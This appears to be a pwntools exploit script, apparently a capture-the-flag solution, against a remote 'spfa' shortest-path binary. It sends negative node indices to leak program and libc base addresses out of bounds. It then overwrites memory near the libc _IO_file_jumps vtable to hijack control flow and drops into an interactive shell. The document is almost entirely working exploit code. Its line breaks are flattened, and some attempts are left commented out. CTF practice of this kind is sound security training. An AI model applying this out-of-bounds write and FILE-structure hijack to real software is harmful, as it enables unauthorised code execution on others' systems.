sh=remote('chuj.top',47250) #libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') #sh=process('./spfa') libc=ELF('./libc-2.31.so') #gdb.attach(sh,'b main') defpwn(): #gdb.attach(sh,"b main") sh.sendlineafter('how many datas?\n>> ','3') sh.sendlineafter('how many nodes?\n>> ','2') sh.sendlineafter('how many edges?\n>> ','1') sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat') sh.sendline(str(0x10)) sh.sendline(str(0x20)) sh.sendline(str(0x30)) sh.sendlineafter('you want to start from which node?\n>> ',str(0x10)) sh.sendlineafter(' to ?\n>>',str(-2275)) sh.recvuntil('the length of the shortest path is ') dist_addr=int(sh.recvuntil('\n').split('\n')[0])-8+0x4720 elf_base=dist_addr-0x4720-0x7000 bss_addr=dist_addr-0x4720 dock_addr=elf_base+0x16A5 printhex(bss_addr)
sh.sendlineafter('how many nodes?\n>> ','2') sh.sendlineafter('how many edges?\n>> ','1') sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat') sh.sendline(str(0x30)) sh.sendline(str(0x40)) sh.sendline(str(0x50)) sh.sendlineafter('you want to start from which node?\n>> ',str(0x10)) sh.sendlineafter(' to ?\n>>',str(-2272)) sh.recvuntil('the length of the shortest path is ') libc_base=int(sh.recvuntil('\n').split('\n')[0])-libc.sym['_IO_2_1_stdout_'] printhex(libc.sym['_IO_file_jumps']) #io=libc_base+0x1ec8a0+0x38 io=libc_base+libc.sym['_IO_file_jumps']+0x28 printhex(io)
sh.sendlineafter('how many nodes?\n>> ','2') sh.sendlineafter('how many edges?\n>> ','1') sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat') sh.sendline(str(0x10)) sh.sendline(str((io-dist_addr)/8)) sh.sendline(str(dock_addr)) #gdb.attach(sh) sh.sendlineafter('you want to start from which node?\n>> ',str(0x10)) #sh.sendlineafter(' to ?\n>>','1') # sh.recvuntil('the length of the shortest path is ')
# sh.sendlineafter('how many nodes?\n>> ','2') # sh.sendlineafter('how many edges?\n>> ','1') # sh.recvuntil('input edges in the\n[from] [to] [distant]\nformat') # sh.sendline(str(1)) # sh.sendline('-2217') # gdb.attach(sh) # sh.sendline(str(bss_addr+0x100+0xd8+0x38)) # sh.sendlineafter('you want to start from which node?\n>> ',str(0x10)) # sh.sendlineafter(' to ?\n>>',str(-2272)) # sh.recvuntil('the length of the shortest path is ') sh.interactive()